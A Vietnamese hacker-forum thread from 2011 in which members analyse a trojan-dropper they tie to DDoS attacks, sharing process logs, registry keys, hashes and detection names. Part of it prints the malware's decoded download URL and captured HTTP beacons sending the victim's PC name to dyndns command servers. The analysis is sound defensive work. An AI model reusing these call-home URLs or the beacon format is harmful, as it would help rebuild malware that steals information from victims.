Chiều giờ ngồi nhà theo dõi topic này luôn. Ngoài trời đang mưa nữa, có lý do ngồi nhà hợp lý smilie




Hì hì, trời này làm vài ve ở SG với anh em chắc có lý lắm đây. Sydney lạnh bỏ bu. Tối nay xuống còn có 3 độ.

Còn cái msHelpCenter.exe thì anh nghĩ có thể nó đi ra từ những con trojan nhỏ hơn tự động "call home" và download những binaries lớn hơn.
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 16:43:43 (+0700) | #111 | 244127
TQN
Elite Member
[Minus] 0 [Plus]
Joined: 29/06/2006 22:28:01
Bài gởi: 888
Đến từ: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Đơn giản nhất cho mọi người tự kiểm tra là: open jucheck.exe = Notepad smilie, search string MSVBVM60.DLL. Nếu có, nó chính là virus, còn không thì cho chắc ăn, up lên VirusTotal để check.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 16:43:57 (+0700) | #112 | 244129
mv1098
Member
[Minus] 0 [Plus]
Joined: 18/07/2009 14:19:13
Bài gởi: 119
Offline
[Profile] [PM]
Đây là tiến trình chạy của em MsHelpCenter.exe


Code:
Set File Attributes: %SystemRoot%\Microsoft Help\thumbcache.db Flags: (FILE_ATTRIBUTE_NORMAL SECURITY_ANONYMOUS)
Delete File: %SystemRoot%\Microsoft Help\thumbcache.db
Create File: %SystemRoot%\Microsoft Help\thumbcache.db
Set File Attributes: %SystemRoot%\Microsoft Help\thumbcache.db Flags: (FILE_ATTRIBUTE_ARCHIVE FILE_ATTRIBUTE_HIDDEN FILE_ATTRIBUTE_READONLY FILE_ATTRIBUTE_SYSTEM SECURITY_ANONYMOUS)
Set File Attributes: %SystemRoot%\Microsoft Help\_desktop.ini Flags: (FILE_ATTRIBUTE_NORMAL SECURITY_ANONYMOUS)
Delete File: %SystemRoot%\Microsoft Help\_desktop.ini
Create File: %SystemRoot%\Microsoft Help\_desktop.ini
Set File Attributes: %SystemRoot%\Microsoft Help\_desktop.ini Flags: (FILE_ATTRIBUTE_ARCHIVE FILE_ATTRIBUTE_HIDDEN FILE_ATTRIBUTE_READONLY FILE_ATTRIBUTE_SYSTEM SECURITY_ANONYMOUS)
Set File Attributes: %SystemRoot%\Microsoft Help\MsHelpCenter.idx Flags: (FILE_ATTRIBUTE_NORMAL SECURITY_ANONYMOUS)
Delete File: %SystemRoot%\Microsoft Help\MsHelpCenter.idx
Create File: %SystemRoot%\Microsoft Help\MsHelpCenter.idx
Set File Attributes: %SystemRoot%\Microsoft Help\MsHelpCenter.old Flags: (FILE_ATTRIBUTE_NORMAL SECURITY_ANONYMOUS)
Delete File: %SystemRoot%\Microsoft Help\MsHelpCenter.old
Move File: %SystemRoot%\Microsoft Help\MsHelpCenter.exe to %SystemRoot%\Microsoft Help\MsHelpCenter.old
Set File Attributes: %SystemRoot%\Microsoft Help\MsHelpCenter.exe Flags: (FILE_ATTRIBUTE_NORMAL SECURITY_ANONYMOUS)
Delete File: %SystemRoot%\Microsoft Help\MsHelpCenter.exe
Create File: %SystemRoot%\Microsoft Help\MsHelpCenter.exe
Set File Attributes: C:\MsHelpCenter.pdb Flags: (FILE_ATTRIBUTE_NORMAL SECURITY_ANONYMOUS)
Delete File: C:\MsHelpCenter.pdb
Create File: C:\MsHelpCenter.pdb
Set File Attributes: C:\MsHelpCenter.pdb Flags: (FILE_ATTRIBUTE_ARCHIVE FILE_ATTRIBUTE_HIDDEN FILE_ATTRIBUTE_READONLY FILE_ATTRIBUTE_SYSTEM SECURITY_ANONYMOUS)
Delete File: C:\80423577.rar
Move File: C:\80423577.exe to C:\80423577.rar
Set File Attributes: C:\80423577.rar Flags: (FILE_ATTRIBUTE_ARCHIVE FILE_ATTRIBUTE_HIDDEN FILE_ATTRIBUTE_READONLY FILE_ATTRIBUTE_SYSTEM SECURITY_ANONYMOUS)
Copy File: C:\MsHelpCenter.pdb to C:\80423577.exe
Open File: %SystemRoot%\AppPatch\sysmain.sdb
Open File: %SystemRoot%\AppPatch\systest.sdb
Open File: \Device\NamedPipe\ShimViewer
Open File: C:\
Find File: C:\80423577.exe
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 16:45:53 (+0700) | #113 | 244130
mv1098
Member
[Minus] 0 [Plus]
Joined: 18/07/2009 14:19:13
Bài gởi: 119
Offline
[Profile] [PM]
Ngoài ra còn thay rồi trong reg

Code:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Microsoft Help Center\DatabaseIndex = [REG_DWORD, value: 00000002]
HKEY_CURRENT_USER\Software\Microsoft\Windows\Microsoft Help Center\ContentHash = 470065006E006500720061006C00
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 17:11:22 (+0700) | #114 | 244131
PXMMRF
Administrator
Joined: 26/09/2002 07:17:55
Bài gởi: 946
Offline
[Profile] [PM]
acoustics89 wrote:
nhưng mấy anh ơi, bài toán lại bắt đầu lại rồi : MsHelpCenter.exe
Câu hỏi: ai tải cái và các file kia về ?? smilie

Trả lời nốt câu này mới ổn ??


Tôi cho rằng cần phải xem lai cái file MsHelpCenter.exe
Đây là file chính thức của MS mà. Nó được digitally signed ngon lành bởi MS mà
original name: MsHelpCenter.exe
internal name: (cũng là) MsHelpCenter.exe
file version.: 6.1.7600.16385
MD5 : 915e9432ca9414a771071ee0cc115930
SHA1 : 9ec74f80c7b03ff2ab4ecbe57b5a1d0296a3bee6
SHA256: b34852815cffab3bfb557e552f8566f80cbe2915895bae9b6e7d085eab7e7f6d
ssdeep: 3072:acFDLF09RoMPXa5zgKSfpBitAggb4d/VpvF2CmsNd:tFDLFFW8gbpUt7V7Vms
File size : 9332736 bytes
OK?
---------
Tôi cho rằng có lẽ một trojạn nhất định phải nằm trong file MsHelpCenter.idx ấy. [8.8 MB- Modified: (chắc bởi STL) Friday, December 31, 2010, 9:34:38 AM]
Có lẽ trojạn embedded trong file này (trojạn thuôc loại Downloader-Dropper trojạn gì đó) mới được dùng để download Adobeupdater.exe về chứ.

Kiểm tra sơ bộ thì dường như vậy.

Nhưng để kiểm tra kỹ hơn, vì đang bận check cái webserver (master website) mà asaxin cung cấp.
Đây chắc là master website chứa Adobeupdater.exe nhúng trong một image file .jpg

Các file khác -desktop.ini, thumb.... thì theo tôi không cần quan tâm


The absence of disagreement is not harmony, it's apathy.
(Socrates)
Honest disagreement is often a good sign of progress.
(Mahatma Gandhi)
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 17:48:08 (+0700) | #115 | 244135
[Avatar]
bolzano_1989
Journalist
[Minus] 0 [Plus]
Joined: 30/01/2007 12:49:15
Bài gởi: 1406
Offline
[Profile] [PM]
PXMMRF wrote:

Tôi cho rằng cần phải xem lai cái file MsHelpCenter.exe
Đây là file chính thức của MS mà. Nó được digitally signed ngon lành bởi MS mà
original name: MsHelpCenter.exe
internal name: (cũng là) MsHelpCenter.exe
file version.: 6.1.7600.16385
MD5 : 915e9432ca9414a771071ee0cc115930
SHA1 : 9ec74f80c7b03ff2ab4ecbe57b5a1d0296a3bee6
SHA256: b34852815cffab3bfb557e552f8566f80cbe2915895bae9b6e7d085eab7e7f6d
ssdeep: 3072:acFDLF09RoMPXa5zgKSfpBitAggb4d/VpvF2CmsNd:tFDLFFW8gbpUt7V7Vms
File size : 9332736 bytes
OK?



Cháu xem kết quả sigcheck ở link sau thì thấy là unsigned smilie :
http://www.virustotal.com/file-scan/report.html?id=b34852815cffab3bfb557e552f8566f80cbe2915895bae9b6e7d085eab7e7f6d-1311589090
Kiểm tra các file bạn nghi ngờ có virus:
http://goo.gl/m3Fb6C
http://goo.gl/EqaZt
http://goo.gl/gEF8e
Nhận mẫu virus qua FB: http://goo.gl/70Xo23
HVA Malware Response Team: kiemtravirus@gmail.com
Trợ giúp diệt virus: http://goo.gl/2bqxY
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 17:58:47 (+0700) | #116 | 244136
PXMMRF
Administrator
Joined: 26/09/2002 07:17:55
Bài gởi: 946
Offline
[Profile] [PM]
Đúng rồi có một Trojạn nằm trong file MsHelpCenter.idx , như tôi nói ở trên

Đây là một trojạn khá mới, vì các virus DAT file của F-secure chỉ mới update vào cuối tháng 5 năm 2011.

Trình Avira AntiVir cài trong máy của tôi không phát hiện được trojan này khi download nó từ Mediafire về, dù Avira để ở chế độ Guard:active. Tuy nhiên scan thẳng vào file thì phát hiện ra.
Còn trình McAfee (enterprise) cũng cài trên máy tôi thì không phát hiện ra gì, dù scan thẳng vào file

Avira gọi nó là TR/Dropper.Gen4, còn F-secure gọi là Backdoor.Generic.649884, AVG gọi là Dropper.Generic3.BNIS, Avas goi Win32:Malware-gen... vân vân.

Riêng SpyRemove thì gọi với tên dài BackDoor.Generic 12.APEB ,mô tả nó như một trojan-backdoor nguy hiểm chay trong hệ thống cho phép hacker thâm nhập từ xa vào các máy bị nhiễm trojan trên mạng. BackDoor.Generic 12.APEB sử dụng một chương trình cho phép download về máy nhiễm trojan các file nguy hiểm từ trên mạng. Trojan này cũng có một keylogger thu thập các thông tin cá nhân từ máy nạn nhân (bị nhiễm Trojan) gửi đến các webserver của hacker...

Vậy trojan này chính là công cụ download Adobeupdater.exe và các file tương tự khác từ Master websites về máy nạn nhân (chứ không phải là MsHelpCenter.exe ). Các bạn kiểm tra kỹ sẽ thấy.



The absence of disagreement is not harmony, it's apathy.
(Socrates)
Honest disagreement is often a good sign of progress.
(Mahatma Gandhi)
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 19:01:23 (+0700) | #117 | 244139
PXMMRF
Administrator
Joined: 26/09/2002 07:17:55
Bài gởi: 946
Offline
[Profile] [PM]
bolzano_1989 wrote:
PXMMRF wrote:

Tôi cho rằng cần phải xem lai cái file MsHelpCenter.exe
Đây là file chính thức của MS mà. Nó được digitally signed ngon lành bởi MS mà
original name: MsHelpCenter.exe
internal name: (cũng là) MsHelpCenter.exe
file version.: 6.1.7600.16385
MD5 : 915e9432ca9414a771071ee0cc115930
SHA1 : 9ec74f80c7b03ff2ab4ecbe57b5a1d0296a3bee6
SHA256: b34852815cffab3bfb557e552f8566f80cbe2915895bae9b6e7d085eab7e7f6d
ssdeep: 3072:acFDLF09RoMPXa5zgKSfpBitAggb4d/VpvF2CmsNd:tFDLFFW8gbpUt7V7Vms
File size : 9332736 bytes
OK?



Cháu xem kết quả sigcheck ở link sau thì thấy là unsigned smilie :
http://www.virustotal.com/file-scan/report.html?id=b34852815cffab3bfb557e552f8566f80cbe2915895bae9b6e7d085eab7e7f6d-1311589090


Nó đây nè bolzano_1989 ạ
Chú ý trong folder có tên là MsHelpCenter mà bạn asaxin upload lên Mediafire có 2 file: MsHelpcenter.exe và MsHelpCenter.idx. File MsHelpCenter.idx mới có Trojan còn file kia MsHelpCenter.exe (.exe file-fice chạy) thì lai là 1 file nguyên thuỷ của MS.

Bản phân tích của MsHelpCenter.exe đây nè:








The absence of disagreement is not harmony, it's apathy.
(Socrates)
Honest disagreement is often a good sign of progress.
(Mahatma Gandhi)
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 19:25:41 (+0700) | #118 | 244141
texudo
Member
[Minus] 0 [Plus]
Joined: 20/07/2011 11:14:04
Bài gởi: 31
Offline
[Profile] [PM]
http://file.virscan.org/report/bf383219ec51b164e9b9c307426803a6.html


Không biết ai đã submit lên, nhưng trên VIRSCAN đã có mẫu này từ 21/07. Đúng những virus mà anh PXMMRF đã chỉ ra.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 19:48:15 (+0700) | #119 | 244142
TQN
Elite Member
[Minus] 0 [Plus]
Joined: 29/06/2006 22:28:01
Bài gởi: 888
Đến từ: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Giờ rãnh rỗi, ngồi úp cái đống MsHelpCenter.* lên KIS, MS, Avira, Symantec. Mô tả bằng tiếng Anh khó quá. Thôi viết tiếng Việt rồi dùng Google Translate ra đại cho rồi. Hy vọng mấy thằng bên đó đọc hiểu được 50%.

Mấy anh STL chơi ác quá ha, nhét dump bitmap, dump resource data vào mấy cái file của mấy anh để mấy file đó bự bà cố luôn, 8-9 MB, để bà con khỏi úp lên các AV và các online scan phải không ?
Hồi chiều, ngồi tự hỏi: quái, tụi này không không nhét mấy cái "Background" Bmp Resource tới 8-9 MB vào file PE của tụi nó chi vầy ? Đọc code, debug, breakpoint đủ kiểu chả thấy nó đụng tới Bmp Resource gì cả !

Không sao, em remove mấy cái dump resource, dump bitmap đó đi, up tuốt. Giờ úp lại nè, nãy giờ úp 2 lần đều faild hết. File em đã úp cái đống đó lên tới 26MB.

Giờ up được rồi. File up chỉ còn 247 KB, chuyện nhỏ. Tụi này dùng giới hạn up file của các trang web submit sample của các AVs, thông thường là 8 MB.

[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 20:17:35 (+0700) | #120 | 244144
template
Member
[Minus] 0 [Plus]
Joined: 25/07/2011 02:18:47
Bài gởi: 16
Offline
[Profile] [PM]
Cố gắng lên anh TQN, sẵn luyện TOEFL luôn

Bọn STL này gặp anh ai chứ gặp anh TQN thì nên đi ngủ sớm

Rolex0210
Member
[Minus] 0 [Plus]
Joined: 17/04/2010 07:54:57
Bài gởi: 9
Offline
[Profile] [PM]
Đọc xong cả Topic cho đến lúc này e chỉ có 1 câu để nói là: Các thành viên trong HVA quá tuyệt vời smilie Phối hợp với nhau cứ như 1 đội hình... chả biết dùng từ gì nữa ^^

Em có cộng tác với 1 vài tờ báo mạng, định sẽ viết 1 bài tóm lược về việc phân tích và kết quả đạt được như trên của mấy a để cho mọi người cùng xem, không biết có phiền gì không ạ ???
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 21:00:46 (+0700) | #122 | 244147
TQN
Elite Member
[Minus] 0 [Plus]
Joined: 29/06/2006 22:28:01
Bài gởi: 888
Đến từ: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Quá tốt, viết thì cứ viết, đừng ngại gì cả. Viết để phổ biến cho mọi người biết về dịch bệnh âm ỉ stl này và chữa trị !
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 21:38:06 (+0700) | #123 | 244149
[Avatar]
bolzano_1989
Journalist
[Minus] 0 [Plus]
Joined: 30/01/2007 12:49:15
Bài gởi: 1406
Offline
[Profile] [PM]
Rolex0210 wrote:
Đọc xong cả Topic cho đến lúc này e chỉ có 1 câu để nói là: Các thành viên trong HVA quá tuyệt vời smilie Phối hợp với nhau cứ như 1 đội hình... chả biết dùng từ gì nữa ^^

Em có cộng tác với 1 vài tờ báo mạng, định sẽ viết 1 bài tóm lược về việc phân tích và kết quả đạt được như trên của mấy a để cho mọi người cùng xem, không biết có phiền gì không ạ ???


bolzano_1989 nghĩ anh/chị nên gửi anh TQN xem qua trước khi đưa bài viết lên báo để tránh các sai sót về kĩ thuật smilie .
Kiểm tra các file bạn nghi ngờ có virus:
http://goo.gl/m3Fb6C
http://goo.gl/EqaZt
http://goo.gl/gEF8e
Nhận mẫu virus qua FB: http://goo.gl/70Xo23
HVA Malware Response Team: kiemtravirus@gmail.com
Trợ giúp diệt virus: http://goo.gl/2bqxY
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 21:48:54 (+0700) | #124 | 244150
Rolex0210
Member
[Minus] 0 [Plus]
Joined: 17/04/2010 07:54:57
Bài gởi: 9
Offline
[Profile] [PM]
Dạ đúng như vậy. E chỉ nắm được là chúng ta đang tìm cái "gốc" để từ đó mà nhận dạng, tránh để bị ảnh hưởng xấu từ thứ độc hại mà bọn STL gây ra ( em bị nhiễm a TQN rùi =.=' ) còn mấy cái tool và thuật ngữ chuyên ngành em vẫn đang tìm cách giải thích, so sánh sao cho người ngoài ngành cntt vẫn hiểu được. Cái chính là e muốn nêu lên tinh thần đoàn kết và sự nhiệt tình với công việc của mọi người trong HVA smilie
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 22:21:24 (+0700) | #125 | 244152
[Avatar]
tmd
Member
[Minus] 0 [Plus]
Joined: 28/06/2006 03:39:48
Bài gởi: 2951
Offline
[Profile] [PM]
Viết báo thì phải biết là viết cho ai đọc. Vậy là đủ rồi. Bài đăng thông tin thông báo, thông tin gợi ý, thông tin kỹ thuật chuyên môn, thông tin phòng chống, thông tin định danh chủ thể phá hoại, hoặc thông tin kịch tính kiểu như báo lá cải.... Tuỳ chọn, người viết đừng quá sa đà vào kiểu gán gép , chỉ đích danh hoặc bài báo "huyền bí" về nội dung.
3 giai đoạn của con... người, ban đầu dek biết gì thì phải thăm dò, sau đó biết rồi thì phải thân thiết, sau cùng khi quá thân thiết rồi thì phải tình thương mến thương. Nhưng mà không thương được thì ...
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 00:06:13 (+0700) | #126 | 244154
lequi
Member
[Minus] 0 [Plus]
Joined: 29/04/2007 18:13:32
Bài gởi: 77
Offline
[Profile] [PM]

G4GD7ND0CDL4DB7CB0CD3ED6KD9YC2FDYN7BD0OCP4JD7QD0ED3FD6HDO0TC3OC6CD chứa đường dẫn được mã hoá, key là n / 123 = 456. Thuật toán mã hoá thì mình chưa xem kĩ nhưng thiết nghĩ không cần lắm vì xâu này cố định rồi. nó sau khi giải mã ra là http://poxxf.com/flash.swf , tải file này về với User Agent là Gozilla_2/Default.

cái link để download là http://poxxf.com/flash.swf?cpn=<User name>



Thôi tiêu, em vừa thấy acoustics89 nhắc đến User Agent: Gozilla và cấu trúc request kiểu ?cpn=[PC USERNAME]
Bài trước em có nhắc đến User Agent này, vì vội quá nên chưa gửi cho a PXMMRF được.

Phải chăng file unikey ở http://nethoabinh.com/showthread.php?t=315, và nghi ngờ ở http://nethoabinh.com/showthread.php?t=651 cũng của STL (nhưng file này đã bị xoá) ???

Các từ khoá liên quan đến việc tải unikey, flash player trên google trang này (nethoabinh) đều có kết quả đứng đầu (top).

Vừa bật lại cái Wireshark, có 1 vài thông tin bắt được (tên miền gì toàn tiếng Trung Quốc >"<smilie:

maowoli.dyndns-free.com (Destination IP: 78.110.24.85)
biouzhen.dyndns-server.com (Destination IP: 78.110.24.85)
tongfeirou.dyndns-web.com (Destination: server86944.santrex.net)



Vẫn chưa biết được service/process nào liên quan đến những URL này smilie. Em đang bật smartsniff của nirsoft nhưng tình hình có vẻ im lặng quá.

Ngóng chờ tiếp smilie
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 00:15:08 (+0700) | #127 | 244155
lequi
Member
[Minus] 0 [Plus]
Joined: 29/04/2007 18:13:32
Bài gởi: 77
Offline
[Profile] [PM]
1 vài packet vừa bắt được, nhưng em kiểm tra smartsniff hình như ko biết được processId

GET /banner1.png?cpn=LEQUY-PC HTTP/1.1
Host: maowoli.dyndns-free.com
User-Agent: Gozilla_2/General
Accept: */*
Pragma: no-cache
Cache-Control: no-cache
Connection: close

GET /banner1.png?cpn=LEQUY-PC HTTP/1.1
Host: biouzhen.dyndns-server.com
User-Agent: Gozilla_2/General
Accept: */*
Pragma: no-cache
Cache-Control: no-cache
Connection: close

GET /banner1.png?cpn=LEQUY-PC HTTP/1.1
Host: tongfeirou.dyndns-web.com
User-Agent: Gozilla_2/General
Accept: */*
Pragma: no-cache
Cache-Control: no-cache
Connection: close

GET /banner1.png?cpn=LEQUY-PC HTTP/1.1
Host: maowoli.dyndns-free.com
User-Agent: Gozilla_2/General
Accept: */*
Pragma: no-cache
Cache-Control: no-cache
Connection: close

GET /banner1.png?cpn=LEQUY-PC HTTP/1.1
Host: biouzhen.dyndns-server.com
User-Agent: Gozilla_2/General
Accept: */*
Pragma: no-cache
Cache-Control: no-cache
Connection: close

[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 04:34:32 (+0700) | #128 | 244156
[Avatar]
conmale
Administrator
Joined: 07/05/2004 23:43:15
Bài gởi: 9353
Đến từ: down under
Offline
[Profile] [PM]
TQN wrote:
Giờ rãnh rỗi, ngồi úp cái đống MsHelpCenter.* lên KIS, MS, Avira, Symantec. Mô tả bằng tiếng Anh khó quá. Thôi viết tiếng Việt rồi dùng Google Translate ra đại cho rồi. Hy vọng mấy thằng bên đó đọc hiểu được 50%.

Mấy anh STL chơi ác quá ha, nhét dump bitmap, dump resource data vào mấy cái file của mấy anh để mấy file đó bự bà cố luôn, 8-9 MB, để bà con khỏi úp lên các AV và các online scan phải không ?
Hồi chiều, ngồi tự hỏi: quái, tụi này không không nhét mấy cái "Background" Bmp Resource tới 8-9 MB vào file PE của tụi nó chi vầy ? Đọc code, debug, breakpoint đủ kiểu chả thấy nó đụng tới Bmp Resource gì cả !

Không sao, em remove mấy cái dump resource, dump bitmap đó đi, up tuốt. Giờ úp lại nè, nãy giờ úp 2 lần đều faild hết. File em đã úp cái đống đó lên tới 26MB.

Giờ up được rồi. File up chỉ còn 247 KB, chuyện nhỏ. Tụi này dùng giới hạn up file của các trang web submit sample của các AVs, thông thường là 8 MB.




Hì hì, em cứ viết 1 bức thư bằng tiếng Việt, trình bày cụ thể từng chi tiết theo góc độ kỹ thuật em nhận định rồi gởi cho anh. Anh chuyển nó sang tiếng Anh và gởi ngược lại cho em ngay trong vòng vài phút. Đừng dùng google translate em vì nó buồn cười lắm smilie.

What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 05:56:33 (+0700) | #129 | 244158
texudo
Member
[Minus] 0 [Plus]
Joined: 20/07/2011 11:14:04
Bài gởi: 31
Offline
[Profile] [PM]
2 trang YeuHoaBinh.com và NetHoaBinh.com có rank là 682 và 688 (theo thứ tự các website ViệtNam) trên Alexa.

Và...việc tìm kiếm tới UniKey luôn đứng đầu 2 site này...chứng tỏ bà còn Việt bị nhiễm malware hơi nhiều.

http://www.alexa.com/siteinfo/nethoabinh.com

http://www.alexa.com/siteinfo/yeuhoabinh.com

Một điều đáng ngạc nhiên là như lequi nói: Khi search google về Flash Player download thì NETHOABINH.COM đứng trong top đầu mới kinh. Tuy nhiên link tới mediafire.com đã bị delete, ai có file Flash Player này thì tốt quá.

Mà cái bạn "LAM VOI" trên NETHOABINH có vẻ hâm mộ TQ quá, avatar là anh LÝ THÀNH LONG, lại còn học tiếng Trung Quốc....

@lequi: check traffic qua nettop cho các domain mà bạn đưa ra thì hầu hết là ZERO, và các domain này vừa mới được thiết lập (vào khoảng thời gian đầu tháng 7).
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 08:16:06 (+0700) | #130 | 244159
acoustics89
Member
[Minus] 0 [Plus]
Joined: 08/07/2011 10:17:19
Bài gởi: 50
Offline
[Profile] [PM]
@lequi: chắc anh em lại cùng với bạn phối hợp lấy mẫu như hôm qua. xong bạn up mẫu lên đây nhé, mọi người phân tích cũng nhanh thôi
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 08:53:22 (+0700) | #131 | 244165
[Avatar]
bolzano_1989
Journalist
[Minus] 0 [Plus]
Joined: 30/01/2007 12:49:15
Bài gởi: 1406
Offline
[Profile] [PM]
PXMMRF wrote:
bolzano_1989 wrote:
PXMMRF wrote:

Tôi cho rằng cần phải xem lai cái file MsHelpCenter.exe
Đây là file chính thức của MS mà. Nó được digitally signed ngon lành bởi MS mà
original name: MsHelpCenter.exe
internal name: (cũng là) MsHelpCenter.exe
file version.: 6.1.7600.16385
MD5 : 915e9432ca9414a771071ee0cc115930
SHA1 : 9ec74f80c7b03ff2ab4ecbe57b5a1d0296a3bee6
SHA256: b34852815cffab3bfb557e552f8566f80cbe2915895bae9b6e7d085eab7e7f6d
ssdeep: 3072:acFDLF09RoMPXa5zgKSfpBitAggb4d/VpvF2CmsNd:tFDLFFW8gbpUt7V7Vms
File size : 9332736 bytes
OK?



Cháu xem kết quả sigcheck ở link sau thì thấy là unsigned smilie :
http://www.virustotal.com/file-scan/report.html?id=b34852815cffab3bfb557e552f8566f80cbe2915895bae9b6e7d085eab7e7f6d-1311589090


Nó đây nè bolzano_1989 ạ
Chú ý trong folder có tên là MsHelpCenter mà bạn asaxin upload lên Mediafire có 2 file: MsHelpcenter.exe và MsHelpCenter.idx. File MsHelpCenter.idx mới có Trojan còn file kia MsHelpCenter.exe (.exe file-fice chạy) thì lai là 1 file nguyên thuỷ của MS.

Bản phân tích của MsHelpCenter.exe đây nè:











Gửi chú PXMMRF,
Những kết quả sigcheck sau có được là do đám STL làm giả để đánh lừa advanced user:
sigcheck:
publisher....: Microsoft Corporation
copyright....: (c) Microsoft Corporation. All rights reserved.
product......: Microsoft_ Windows_ Operating System
description..: Microsoft Help Center
original name: MsHelpCenter.exe
internal name: MsHelpCenter.exe
file version.: 6.1.7600.16385


Quan trọng nhất khi sigcheck MsHelpCenter.exe là các dòng sau:
Verified: Unsigned
File date: 9:34 AM 12/31/2010
Vào thời điểm này, Microsoft USA không thể có người làm việc liên quan đến file MsHelpCenter.exe này smilie .
Đồng thời file này không được digitally signed bởi Microsoft Windows.
Kiểm tra các file bạn nghi ngờ có virus:
http://goo.gl/m3Fb6C
http://goo.gl/EqaZt
http://goo.gl/gEF8e
Nhận mẫu virus qua FB: http://goo.gl/70Xo23
HVA Malware Response Team: kiemtravirus@gmail.com
Trợ giúp diệt virus: http://goo.gl/2bqxY
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 09:43:19 (+0700) | #132 | 244167
exception
Member
[Minus] 0 [Plus]
Joined: 10/07/2011 23:48:25
Bài gởi: 15
Offline
[Profile] [PM]
Các bạn submit các mẫu cho tất cả các AV luôn nhé:

http://www.kernelmode.info/forum/viewtopic.php?f=16&t=1018
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 10:35:51 (+0700) | #133 | 244169
ptv_vbhp
Member
[Minus] 0 [Plus]
Joined: 25/07/2011 10:16:44
Bài gởi: 11
Offline
[Profile] [PM]
Em dùng Bkav pro . Hôm trước down mấy mẫu về thấy nó nhai ngon lành . Hic hic ... Cả file fake kia lẫn cái file *.dix


[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 10:58:18 (+0700) | #134 | 244174
PXMMRF
Administrator
Joined: 26/09/2002 07:17:55
Bài gởi: 946
Offline
[Profile] [PM]
bolzano_1989 wrote:
Gửi chú PXMMRF,
Những kết quả sigcheck sau có được là do đám STL làm giả để đánh lừa advanced user:
sigcheck:
publisher....: Microsoft Corporation
copyright....: (c) Microsoft Corporation. All rights reserved.
product......: Microsoft_ Windows_ Operating System
description..: Microsoft Help Center
original name: MsHelpCenter.exe
internal name: MsHelpCenter.exe
file version.: 6.1.7600.16385


Quan trọng nhất khi sigcheck MsHelpCenter.exe là các dòng sau:
Verified: Unsigned
File date: 9:34 AM 12/31/2010
Vào thời điểm này, Microsoft USA không thể có người làm việc liên quan đến file MsHelpCenter.exe này smilie .
Đồng thời file này không được digitally signed bởi Microsoft Windows.


Trước hết cám ơn bolzano_1989 vì đã quote lai các file hình ảnh trên bài tôi viết. Tôi thường bổ sung hình ảnh để bài viết khỏi nhàm chán, các bạn đỡ mất công phải click nhiều lần và xem cho sướng mắt. Cũng còn có đôi lý do khác, hay hay đấy.
Sau nữa cảm ơn về những đóng góp của bạn, thể hiện việc bạn luôn không ngai khó, tìm hiểu đến cùng những vấn đề mình chưa biết hay chưa đồng ý. Đó là đức tinh quý và cần của người làm bảo mật. Trước đây Triệu trần Đức cũng có đức tính này.

Quay trở lại vấn đề file MSHelpCenter.exe, tôi có thêm ý kiến sau:

1- Đây là file nguyên thuỷ (originally made) của MS. Hầu hết các OS của MS đều sử dụng file này.

2- Nhưng cũng vì vậy có rất nhiều phiên bản (version) của file nói trên. MS lọc -cắt bớt- bổ sung file nguyên thuỷ cho phù hợp với từng OS. Vì vậy nói về file MSHelpCenter.exe là phải nói chính xác là nó ở OS nào, đã được update chưa?
Đã có một công ty chuyên làm về File Database thống kê hiên nay có tới gần 60 loại file MSHelpCenter.exe với nôi dung có các điểm khác nhau, dung lượng khác nhau (tất nhiên MD5 cũng khác nhau)
Tham khảo tại:
http://systemexplorer.net/db/mshelpcenter.exe.html

3- Có lẽ chính vì vậy mà MS khó hay không thể áp dụng việc Digitally signed cho tất cả các file MSHelpCenter.exe trong thưc tế. Tất nhiên các file khác chỉ có 1 version hay một vài version thì có thể.

4- Như tôi đã nói ở post trên, các hacker hay đặt tên các service, process, file của virus trùng đúng với tên service, process, file nguyên thuỷ của các HDH, nhằm làm cho user không nghi ngờ hay nếu nghi ngờ thì lại bối rối ....
Do vậy không loại trừ khả năng có một hacker nào đó trên TG đã đặt tên file của virus là MSHelpCenter.exe, hay nhúng virus vào trong file này (Thưc tế điều này đã có- Xin xem hình cho đỡ mỏi tay click)





